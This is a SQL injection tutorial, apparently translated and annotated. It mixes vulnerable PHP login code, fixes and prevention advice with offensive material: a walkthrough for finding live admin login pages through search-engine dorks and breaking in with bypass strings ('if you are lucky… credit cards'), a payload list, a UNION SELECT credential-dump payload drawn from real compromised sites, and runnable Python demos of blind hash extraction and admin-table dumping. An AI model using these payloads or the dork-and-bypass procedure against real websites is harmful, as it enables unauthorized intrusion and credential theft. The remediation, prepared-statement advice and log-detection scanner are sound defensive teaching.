HOW TO HACK A WEBSITE WITH SQL INJECTION

So what is SQL INJECTION?
SQL injection is an attack in which a web application that builds SQL statements out of user input (a form field or a URL parameter) is made to run SQL the developer never intended, by sending input that changes the structure of the statement. The attack happens on the server side, against the application and its database; the client (browser) is only the place the attacker types the payload.

Causes of SQL injection
1) Input containing the single quote character ' or the SQL comment marker -- is not handled, so an attacker's text becomes part of the SQL statement instead of being treated as data.
2) An attacker can therefore insert SQL commands into a URL parameter or a form field.
Is an SQL injection bug dangerous?
1) It lets someone log into a system without having an account.
2) It also lets someone modify, delete or add data held in the database.
3) Worse still, it can be used to take the database itself down, so it can no longer serve the web server.
What do you need to carry out SQL injection?
1) Internet Explorer or any other browser
2) A PC connected to the Internet
3) Nothing else. (The original list also named SoftICE, a Windows kernel debugger; it plays no role here, since the whole attack is carried out through ordinary HTTP requests.)


Example SQL injection syntax
Example SQL inside PHP
1) $SQL = "select * from login where username ='$username' and password = '$password'"; (with $username and $password taken straight from the GET or POST variables)
2) Enter ' or ''=' as the password
3) The statement the database receives is then select * from login where username = '$username' and password = '' or ''='' . AND binds tighter than OR, so the condition reads (username = '...' AND password = '') OR ''='' and ''='' is always TRUE, so every row is selected
4) So we can inject SQL syntax (here, an OR) into the query
Handling SQL injection

1) Change the PHP script
2) Use mysql_escape_string
3) Filter the ' character by modifying php.ini
1. Changing the PHP script


The original PHP script:
$query = "select id,name,email,password,type,block from user " .
         "where email = '$Email' and password = '$Password'";   // $Email and $Password come straight from the login form
$hasil = mysql_query($query, $id_mySQL);
while($row = mysql_fetch_row($hasil))                           // keeps whichever row came last
{
    $Id = $row[0];
    $name = $row[1];
    $email = $row[2];
    $password = $row[3];
    $type = $row[4];
    $block = $row[5];
}
if(strcmp($block, 'yes') == 0)
{
    echo "<script>alert('Your account has been blocked');
document.location.href='index.php';</script>\n";
    exit();
}
else if(!empty($Id) && !empty($name) && !empty($email) && !empty($password))
{
    // login succeeds (session setup not shown)
}
The script above lets someone log in by inserting SQL into the login form. When the attacker enters ' or ''=' in both the email and the password field, the query becomes:
select id,name,email,password,type,block from user where email = '' or ''='' and password = '' or ''=''
Every row in user satisfies this WHERE clause, so the loop walks the whole table, the variables end up holding the last row returned, the else-if test passes, and the attacker is logged in as that user.
So the script was changed to:
$query = "select id,name,email,password,type,block from user " .
         "where email = '$Email'";                              // the password no longer appears in the SQL
$hasil = mysql_query($query, $id_mySQL);
while($row = mysql_fetch_row($hasil))
{
    $Id = $row[0];
    $name = $row[1];
    $email = $row[2];
    $password = $row[3];
    $type = $row[4];
    $block = $row[5];
}
$pass = md5($Password);                                          // stored passwords are MD5 hashes
if(strcmp($block, 'yes') == 0)
{
    echo "<script>alert('Your account has been blocked');
document.location.href='index.php';</script>\n";
    exit();
}
else if((strcmp($Email, $email) == 0) && (strcmp($pass, $password) == 0))
{
    // login succeeds only if the email matches exactly and the hashes agree
}
Note what this change does and does not do. Comparing the password in PHP means ' or ''=' in the password field no longer matters, and comparing $Email against the email column catches the case where the OR trick returned some other user's row. But $Email is still concatenated into the query, so the email field remains injectable: a UNION SELECT in it can add any row the attacker likes, and the "Your account has been blocked" branch, which fires before the email comparison, tells the attacker whether that row existed. The real fix is to stop building the statement from strings and use a prepared statement with bound parameters (PDO or mysqli), and to store passwords with a slow salted hash (password_hash()) rather than plain MD5.
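The ' or ''=' bypass from the syntax example above and the remaining hole in the changed script, as an added example written for this edition (it is not code from the original page). The page's code is PHP against MySQL; this version is Python using the built-in sqlite3 module so it runs offline. The user table, its two rows, the attacker strings and the 'blocked' return value are constructed for the demo, and MD5 is used only because the page's fixed script uses it.

```python
import hashlib
import sqlite3

# Added example, not code from the original page. It re-creates the login
# logic of the two PHP scripts above in Python against an in-memory SQLite
# table so the attacks can be run offline. Table rows, the attacker strings
# and the "blocked" signalling are constructed for the demo; MD5 appears only
# because the page's fixed script uses it, not as a recommendation.

COLUMNS = "id,name,email,password,type,block"


def md5(s):
    return hashlib.md5(s.encode()).hexdigest()


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute(f"CREATE TABLE user ({COLUMNS})")
    db.executemany("INSERT INTO user VALUES (?,?,?,?,?,?)", [
        (1, "Alice", "alice@example.com", md5("correct horse"), "admin", "no"),
        (2, "Bob",   "bob@example.com",   md5("hunter2"),       "user",  "no"),
    ])
    return db


def last_row(db, query):
    row = None
    for row in db.execute(query):   # the PHP while-loop keeps the last row
        pass
    return row


def login_original(db, email, password):
    """First script: both fields spliced into SQL, success means 'a row came
    back'. The raw password is compared in SQL exactly as on the page, so on
    this hashed table only the injected path ever returns a row."""
    row = last_row(db, f"select {COLUMNS} from user "
                       f"where email = '{email}' and password = '{password}'")
    if row is None:
        return None
    return "blocked" if row[5] == "yes" else row[2]


def login_pagefix(db, email, password):
    """The page's fix: password checked in PHP, but email still spliced in."""
    row = last_row(db, f"select {COLUMNS} from user where email = '{email}'")
    if row is None:
        return None
    if row[5] == "yes":
        return "blocked"              # reached before the email check: an oracle
    return row[2] if email == row[2] and md5(password) == row[3] else None


def login_safe(db, email, password):
    """Bound parameters: the values travel separately from the statement
    text, so nothing in them can change the query structure."""
    row = db.execute(f"select {COLUMNS} from user where email = ?",
                     (email,)).fetchone()
    if row is None:
        return None
    if row[5] == "yes":
        return "blocked"
    return row[2] if md5(password) == row[3] else None


BYPASS = "' or ''='"   # the page's payload, entered in both fields


def steal_hash(login, db, victim, length=32):
    """Boolean-based blind extraction through the 'blocked' message: inject a
    UNION row with block='yes' that only exists when one hex digit of the
    victim's stored hash equals the guess. Returns the hash, or None when the
    login function is not injectable."""
    found = ""
    for pos in range(1, length + 1):
        for c in "0123456789abcdef":
            email = (f"x' UNION SELECT 1,'n','e','p','t','yes' FROM user "
                     f"WHERE email='{victim}' AND substr(password,{pos},1)='{c}'--")
            if login(db, email, "irrelevant") == "blocked":
                found += c
                break
        else:
            return None
    return found


if __name__ == "__main__":
    db = make_db()
    print("original, ' or ''=' in both fields:", login_original(db, BYPASS, BYPASS))
    print("page fix, same payload:            ", login_pagefix(db, BYPASS, BYPASS))
    print("page fix, Alice's hash leaked:     ", steal_hash(login_pagefix, db, "alice@example.com"))
    print("bound parameters, same attack:     ", steal_hash(login_safe, db, "alice@example.com"))
```

Run it and the first line shows the original script logging the attacker in as whichever row came back last; the second shows the page's fix rejecting that payload; the third shows the fix still leaking Alice's password hash one hex digit at a time through the blocked-account message (512 requests at most); the fourth shows the parameterized version giving nothing away.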


2. Using mysql_escape_string

Turns a string containing ' into one containing \' , for example SQL injec'tion becomes SQL injec\'tion
Example: $kar = "SQL injec'tion";
$filter = mysql_real_escape_string($kar);   // mysql_escape_string() is deprecated; the _real_ variant honours the connection's character set
echo "Filter result : $filter";
Result:
Filter result : SQL injec\'tion
Two caveats. Escaping only protects values that sit inside quotes in the SQL; an unquoted numeric parameter such as id=72 gains nothing from it, because the payload 72 AND 1=2 UNION SELECT ... contains no quote to escape. And the whole mysql_* extension was removed in PHP 7; the equivalents are mysqli_real_escape_string() and PDO::quote(), with bound parameters preferred over either.
3. Filtering the ' character by modifying php.ini

The change is to enable magic_quotes_gpc in php.ini, which makes PHP automatically turn ' into \' in every GET, POST and cookie value. This setting was deprecated in PHP 5.3 and removed in 5.4; it also mangles legitimate data and, like the previous method, does nothing for unquoted numeric parameters.
Example:
A script that restricts which characters may be entered (classic ASP / VBScript):
Function validatepassword( input )
    good_password_chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
    validatepassword = True
    For i = 1 To Len( input )
        c = Mid( input, i, 1 )
        If ( InStr( good_password_chars, c ) = 0 ) Then
            validatepassword = False
            Exit Function
        End If
    Next
End Function
Carrying out SQL injection

1) Go to Google or another search engine
2) Enter one of the following search strings
"/admin.asp" "/login.asp" "/logon.asp" "/adminlogin.asp" "/adminlogon.asp" "/admin_login.asp" "/admin_logon.asp" "/admin/admin.asp" "/admin/login.asp" "/admin/logon.asp" {you can add your own variations}
3) Open one of the links Google finds; you will probably land on a login page (user name and password).
4) Enter the following:
User name : ' or 'a'='a   Password : ' or 'a'='a (including the quote marks)
5) If it works, you will probably land in the admin panel, where you can add news, edit other users, change the about page, and so on. If you are lucky you may find a long list of credit cards.
6) If it does not work, try another link from the Google results.
7) Many variations are possible, for example:
User name : admin   Password : ' or 'a'='a, or the same string in both fields, e.g.:
' or 0=0 -- ; " or 0=0 -- ; or 0=0 -- ; ' or 0=0 # ;
" or 0=0 # ; ' or 'x'='x ; " or "x"="x ; ') or ('x'='x
The variants differ in how they close the developer's quoting: " for values quoted with double quotes, ) when the condition was wrapped in parentheses, and -- or # to comment out the rest of the statement (-- is understood by most engines, # only by MySQL).
8) Keep trying until you get into the admin panel

How to prevent SQL INJECTION
1) Limit the length of input boxes (where possible) in the program code, so a beginner is puzzled when a long command does not fit. This is only a speed bump: ' or 1=1-- is twelve characters.
2) Filter the input the user enters, especially the single quote (input validation).
3) Turn off or hide the error messages produced by the running SQL Server; verbose errors tell the attacker how many columns to UNION and what the tables are called.
4) Disable standard facilities such as stored procedures and extended stored procedures (xp_cmdshell and friends on Microsoft SQL Server) where possible.
5) Change "Startup and run SQL Server" to a low-privilege user in the SQL Server Security tab, so a compromised query cannot reach the operating system.
6) Above all, stop building SQL from strings: use prepared statements with bound parameters (PDO or mysqli in PHP, parameterized commands in ASP) so user input can never be parsed as SQL. Items 1 to 5 limit the damage; only this one removes the bug.
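The detection-side counterpart of the list above, as an added example written for this edition (not code from the original page): a small scanner that looks through web-server access logs for the two request shapes this page describes, the UNION SELECT extraction in a URL parameter and the ' or 'a'='a login bypass. It is Python with only the standard library; the rule names, the Apache-style log lines and the IP addresses are constructed for the demo. Note that form POST bodies are not in a standard access log, so a login bypass sent by POST is only visible where the application logs the submitted fields itself.

```python
import re
from urllib.parse import unquote_plus

# Added example, not code from the original page. Rule names, log lines and
# addresses are made up for the demo; tune the patterns to your own
# application before relying on them.

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3}) \S+')

RULES = [
    ("union_select", re.compile(r"\bunion\b(\s+all)?\s+select\b")),
    ("always_true",  re.compile(r"\b(and|or)\s+\d+\s*=\s*\d+")),     # AND 1=2, or 0=0
    ("quote_or",     re.compile(r"'\s*or\s*'[^']*'\s*=\s*'")),        # ' or ''=' / ' or 'a'='a
    ("group_concat", re.compile(r"\bgroup_concat\s*\(")),
    ("comment_tail", re.compile(r"(--|#)\s*$")),
]


def normalize(path):
    """URL-decode twice (catches %2527-style double encoding), fold case,
    drop /**/ comments used as spaces, collapse whitespace, so that
    'UNION/**/SELECT' and 'UNION%0ASELECT' still read as 'union select'."""
    s = unquote_plus(unquote_plus(path)).lower()
    s = re.sub(r"/\*.*?\*/", " ", s)
    return re.sub(r"\s+", " ", s)


def inspect_line(line):
    """Parse one access-log line; return None if it is not a log line,
    otherwise a dict with the rules that fired (possibly none)."""
    m = LOG_RE.match(line)
    if not m:
        return None
    q = normalize(m.group("path"))
    hits = [name for name, rx in RULES if rx.search(q)]
    return {"ip": m.group("ip"), "path": m.group("path"), "hits": hits}


def scan(lines):
    """All lines on which at least one rule fired, in log order."""
    return [r for r in (inspect_line(l) for l in lines) if r and r["hits"]]


SAMPLE_LOG = [  # constructed for the demo
    '203.0.113.5 - - [10/Oct/2010:13:55:36 +0700] "GET /news_detail.php?nid=72 HTTP/1.1" 200 5120',
    '203.0.113.5 - - [10/Oct/2010:13:55:40 +0700] "GET /news_detail.php?nid=72+AND+1%3D2+UNION+SELECT+1%2C2%2C3%2Cgroup_concat%28login%2C0x3a%2Cpassword%29%2C5%2C6%2C7+from+admin-- HTTP/1.1" 200 4870',
    '198.51.100.9 - - [10/Oct/2010:13:56:02 +0700] "GET /admin/login.asp?user=%27+or+%27a%27%3D%27a&pass=x HTTP/1.1" 302 -',
    '192.0.2.7 - - [10/Oct/2010:13:57:10 +0700] "GET /search.php?q=trade+union+members HTTP/1.1" 200 3300',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["ip"], hit["hits"], hit["path"][:60])
```

The always_true and comment_tail rules are noisy on their own; the value is in the combination, and a first-pass triage can simply rank source addresses by the number of distinct rules they tripped. A request that matched union_select and group_concat on a page that returned 200, as in the second sample line, is the exact shape of the URLs in the list at the end of this page and deserves a look at what the response contained.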
Hacking is an art. Hacking is a blend of knowledge, creativity and patience. If you have all three you will succeed.
Below is a list of SQL INJECTION login-bypass strings:
=========kode SQL INJECTION =========
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
=========================
The original page closed with a list of about thirty live websites the author claimed to have compromised with SQL INJECTION, each entry giving the injected URL, the site's admin panel path and the user names and passwords (or password hashes) the query returned. The host names and the dumped credentials are not reproduced here. What every entry had in common is the payload, which after URL decoding reads:

72 AND 1=2 UNION SELECT 1,2,3,group_concat(login,0x3a,password),5,6,7 FROM admin--

with the numeric id (72), the column count (7 here), the position of the displayed column and the table and column names (admin, login, password; user_name/user_pass, username/password and so on) varying per site. AND 1=2 empties the legitimate result set; UNION SELECT with the same number of columns as the original query appends one attacker-controlled row; group_concat() packs every login:password pair of the admin table into the single column the page displays, 0x3a being the MySQL hex literal for ':' chosen so that the payload contains no quote character at all; and the trailing -- comments out whatever the application appended after the id. Because the injection point is an unquoted number, none of the quote-escaping measures in sections 2 and 3 would have blocked a single one of these requests; only binding the parameter, or casting it to an integer before use, does.
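The numeric UNION SELECT extraction just described, as an added example written for this edition (not code from the original page or from any of the sites it listed). The page's targets ran PHP against MySQL; this version is Python with the built-in sqlite3 module so it runs offline. The news and admin tables, their rows and the column layout are constructed for the demo. SQLite has neither the three-argument group_concat nor MySQL's 0x3a string literal, so the separator is produced with char(58) instead; the point of both tricks is the same, a payload with no quote character in it.

```python
import sqlite3

# Added example, not code from the original page. It reproduces the pattern
# nid=72 AND 1=2 UNION SELECT 1,2,3,group_concat(login,0x3a,password),5,6,7
# FROM admin-- against an in-memory SQLite database. Tables, rows and column
# layout are constructed for the demo.


def make_site():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE news (nid INTEGER, title TEXT, body TEXT, author TEXT)")
    db.execute("INSERT INTO news VALUES (72, 'Opening hours', 'We open at 9.', 'staff')")
    db.execute("CREATE TABLE admin (id INTEGER, login TEXT, password TEXT)")
    db.executemany("INSERT INTO admin VALUES (?,?,?)",
                   [(1, "admin", "s3cret"), (2, "editor", "p4ss")])
    return db


def news_detail_vulnerable(db, nid):
    """news_detail.php?nid=... as the listed sites built it: the parameter is
    pasted into the statement unquoted, so no quote escaping ever touches it."""
    return db.execute(f"SELECT title, body, author FROM news WHERE nid = {nid}").fetchall()


def news_detail_fixed(db, nid):
    """Two independent defences: accept only an integer, and bind it instead
    of splicing it into the statement text."""
    if not str(nid).isdigit():
        raise ValueError("nid must be a positive integer")
    return db.execute("SELECT title, body, author FROM news WHERE nid = ?",
                      (int(nid),)).fetchall()


def escape_quotes(s):
    """Roughly what mysql_escape_string() / magic_quotes do (sections 2 and 3
    above). Against a numeric injection it is a no-op: nothing to escape."""
    return s.replace("\\", "\\\\").replace("'", "\\'").replace('"', '\\"')


def count_columns(page, base_id, max_cols=20):
    """Attack step 1: learn how many columns the original SELECT has by
    growing UNION SELECT NULL,NULL,... until the database stops complaining.
    A hidden error message (prevention item 3) does not stop this: the page
    simply looks different until the count is right."""
    for n in range(1, max_cols + 1):
        nulls = ",".join(["NULL"] * n)
        try:
            page(f"{base_id} AND 1=2 UNION SELECT {nulls}--")
            return n
        except sqlite3.OperationalError:   # column-count mismatch
            continue
    return None


def admin_payload(base_id, ncols, slot=0):
    """Attack step 2: the exact shape of the listed URLs. AND 1=2 empties the
    real result, plain numbers fill the columns the page does not show, and
    group_concat() packs the whole admin table into the displayed column."""
    cols = [str(i) for i in range(ncols)]
    cols[slot] = "group_concat(login || char(58) || password)"
    return f"{base_id} AND 1=2 UNION SELECT {','.join(cols)} FROM admin--"


def dump_admins(page, base_id, ncols, slot=0):
    rows = page(admin_payload(base_id, ncols, slot))
    return rows[0][slot] if rows else None


if __name__ == "__main__":
    db = make_site()
    vuln = lambda nid: news_detail_vulnerable(db, nid)
    n = count_columns(vuln, 72)
    p = admin_payload(72, n)
    print("columns in the original SELECT:", n)
    print("quote escaping alters the payload:", escape_quotes(p) != p)
    print("admin table via the vulnerable page:", dump_admins(vuln, 72, n))
    try:
        news_detail_fixed(db, p)
    except ValueError as e:
        print("fixed page:", e)
```

The column-count loop is what the numbers 1,2,3,...,7 in the page's URLs stand for: they are placeholders that made the UNION line up with the original SELECT, and whichever placeholder shows up on the rendered page is the slot that gets replaced by group_concat(). The integer check in news_detail_fixed rejects the whole payload before any SQL is built, and the bound parameter would protect the query even if that check were forgotten.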


Source: http://www.hi-techmall.org/geek/blog/cara-hacking-website-sql-injection